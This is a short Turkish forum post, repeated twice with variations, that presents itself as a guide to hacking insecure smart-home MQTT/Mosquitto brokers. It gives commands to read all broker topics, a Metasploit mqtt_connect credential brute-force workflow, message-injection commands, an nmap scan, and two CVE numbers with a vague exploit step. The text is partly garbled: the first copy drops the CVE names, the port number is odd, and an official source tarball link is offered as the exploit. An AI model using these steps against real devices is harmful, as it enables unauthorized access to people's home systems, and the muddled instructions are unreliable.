- 3 Ara 2022
- 74
- 10
Merhabalar biraz özensiz yazıcağım kb. ama işinize yaricaktır
İLK ÖNCE AKILLI EV SİSTEMLERİ 18883 / TCP MOSQUİTTO / MQTT GİBİ PROTOKOLLERİ KULLANIR VE BUNLAR AĞLARA BAĞLIDIR
EĞER GÜVENLİKSİZ İSE ŞU KOMUTLAR İLE HACKLEYEBİLİRSİNİZ
mosquitto_sub -t '#' -h 127.0.0.1 -v
brute force attack için
me-tasploit
search mqtt_connect
bir tane çıkıcaktır o yüzden use 0 demeniz yeterlidir
gerekli yerleri set USER_FILE SET PASS_FILE SET RHOSTS gibi yerleri tamamladıktan sonra run diyoruz ve başlıyor şifre
bulununca
mosquitto_sub -h 127.0.0.1 -t '#' -v -u kullanıcıadı -P şifresi
ekrana bişey yazdırmak için ise
mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"
Peki Genellikle hangi CVE lerde olurlar??
mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"
bunu yazabilirsiniz
bu varsa
https://mosquitto.org/files/source/mosquitto-1.4.14.tar.gz
linkten indirebilirsiniz ./mqttexploit yazarsanız çalışıcaktır (dosya yoksa veya çalışmazsa ilk nano yapıp target IP gib yerlere IP yi yazın dosya yoksa kb )
NMAP İLE NASIL TARİCAĞIM?
nmap -sV -sC -p- -v 127.0.0.1
buyrunn
Peki MQTT nasıl çalışır?
MQTT'de bir yayıncı bir konu hakkında mesajlar yayınlar ve bir abonenin mesajı görebilmesi için o konuya abone olması gerekir. Mesajlar bir konuyla ilgili bir komisyoncuya yayınlanır. Bir MQTT aracısının işi, iletileri konuya göre filtrelemek ve ardından bunları abonelere dağıtmaktır .
türkçe çevirdim kb.
Devamı gelsin diyorsanız yazabillirsiniz yanlışım olabilir kb. İyi forumlarr <33
İLK ÖNCE AKILLI EV SİSTEMLERİ 18883 / TCP MOSQUİTTO / MQTT GİBİ PROTOKOLLERİ KULLANIR VE BUNLAR AĞLARA BAĞLIDIR
EĞER GÜVENLİKSİZ İSE ŞU KOMUTLAR İLE HACKLEYEBİLİRSİNİZ
mosquitto_sub -t '#' -h 127.0.0.1 -v
brute force attack için
me-tasploit
search mqtt_connect
bir tane çıkıcaktır o yüzden use 0 demeniz yeterlidir
gerekli yerleri set USER_FILE SET PASS_FILE SET RHOSTS gibi yerleri tamamladıktan sonra run diyoruz ve başlıyor şifre
bulununca
mosquitto_sub -h 127.0.0.1 -t '#' -v -u kullanıcıadı -P şifresi
ekrana bişey yazdırmak için ise
mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"
Peki Genellikle hangi CVE lerde olurlar??
CVE-2018-12543
bu cve var isemosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"
bunu yazabilirsiniz
CVE-2017-7651
bu varsa
https://mosquitto.org/files/source/mosquitto-1.4.14.tar.gz
linkten indirebilirsiniz ./mqttexploit yazarsanız çalışıcaktır (dosya yoksa veya çalışmazsa ilk nano yapıp target IP gib yerlere IP yi yazın dosya yoksa kb )
NMAP İLE NASIL TARİCAĞIM?
nmap -sV -sC -p- -v 127.0.0.1
buyrunn
Peki MQTT nasıl çalışır?
O nasıl çalışır?
MQTT (Message Queuing Telemetry Transport), yayınlama/abone olma mesajlaşma modelini kullanan hafif bir makineden makineye (M2M) protokolüdür.MQTT'de bir yayıncı bir konu hakkında mesajlar yayınlar ve bir abonenin mesajı görebilmesi için o konuya abone olması gerekir. Mesajlar bir konuyla ilgili bir komisyoncuya yayınlanır. Bir MQTT aracısının işi, iletileri konuya göre filtrelemek ve ardından bunları abonelere dağıtmaktır .
türkçe çevirdim kb.
Devamı gelsin diyorsanız yazabillirsiniz yanlışım olabilir kb. İyi forumlarr <33